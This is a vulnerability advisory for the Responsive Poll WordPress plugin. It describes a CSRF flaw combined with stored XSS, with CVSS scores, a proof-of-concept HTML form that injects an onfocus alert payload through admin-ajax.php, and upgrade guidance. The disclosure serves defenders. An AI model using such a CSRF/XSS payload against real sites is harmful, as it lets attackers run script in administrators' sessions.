CSRF/XSS in Responsive Poll allows unauthenticated attackers to do almost anything an admin can

Score Vector Complexity Authentication Confidentiality Integrity Availability
Network Medium None Partial Partial None

You can read more about CVSS base scores on Wikipedia or in the CVSS specification.


This plugin lacks CSRF checks when updating polls meaning an unauthenticated attacker can cause anything to be modified in a poll. The plugin also fails to escape values put into HTML. The combination of these two means that an unauthenticated attacker can put arbitrary JavaScript into a page in /wp-admin/.

Proof of concept

Create a poll. We assume that the ID of this poll will be 1.

Visit the following page and click submit (in a real attack the form can be submitted without user interaction):

<form method="POST" action="http://localhost/wp-admin/admin-ajax.php">
<input type="text" name="poll_id" value="1">
<input type="text" name="action" value="update_poll">
<input type="text" name="name" value="&quot; onfocus=&quot;alert(1)">
<input type="submit">

Then visit http://localhost/wp-admin/admin.php?page=polls&action=edit&edit_poll=1 and focus the Question field (either via clicking on it or tabbing to it).

Mitigation/further actions

Upgrade to version 1.7.6 or later.